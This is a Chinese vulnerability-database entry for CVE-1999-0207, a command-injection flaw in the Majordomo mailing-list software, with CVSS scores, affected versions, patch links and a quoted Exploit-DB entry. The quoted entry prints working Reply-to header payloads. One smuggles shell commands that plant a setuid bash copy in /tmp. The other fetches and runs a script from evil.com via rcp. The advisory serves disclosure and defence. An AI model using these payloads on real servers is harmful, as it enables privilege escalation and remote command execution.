CVE-1999-0207
CVSS7.5
发布时间 :1994-06-09 00:00:00
修订时间 :2008-09-09 08:34:00
NMCOE    

[原文]Remote attacker can execute commands through Majordomo using the Reply-To field and a "lists" command.


[CNNVD]Majordomo邮件列表管理软件远程执行任意命令漏洞(CNNVD-199406-003)

        
        Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。
        1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:great_circle_associates:majordomo:1.90
cpe:/a:great_circle_associates:majordomo:1.91

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0207
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199406-003
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Majordomo邮件列表管理软件远程执行任意命令漏洞
高危 未知
1994-06-09 00:00:00 2005-10-12 00:00:00
远程  
        
        Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。
        1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。
        

- 公告与补丁

        厂商补丁:
        Great Circle Associates
        -----------------------
        目前厂商已经在新版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.greatcircle.com/majordomo/

- 漏洞信息 (20597)

Majordomo 1.89/1.90 lists Command Execution Vulnerability (EDBID:20597)
linux remote
1994-06-06 Verified
0 Razvan Dragomirescu
N/A [点击下载]
source: http://www.securityfocus.com/bid/2310/info

Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. 

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro 		

- 漏洞信息

1748
Majordomo Reply-to Field lists Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1994-06-06 Unknow
1994-06-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站